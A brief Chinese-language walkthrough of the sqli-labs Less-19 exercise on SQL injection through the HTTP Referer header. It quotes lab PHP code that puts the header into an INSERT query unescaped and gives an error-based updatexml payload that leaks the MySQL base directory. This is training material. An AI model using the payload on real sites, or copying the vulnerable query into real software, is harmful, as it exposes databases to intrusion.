从源代码中我们可以看到我们获取到的是HTTP_REFERER
$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
echo 'Your Referer is: ' .$uagent;
print_r(mysql_error());
那和less18是基本一致的,我们从referer进行修改。
还是像less18一样,我们只给出一个示例
将referer修改为
1' and updatexml(1,concat(0x7e,(select @@basedir),0x7e),1) and '1'='1
可以看到mysql的路径了。
请发散思维思考其他的呦。
参考:https://www.cnblogs.com/lcamry/p/5763029.html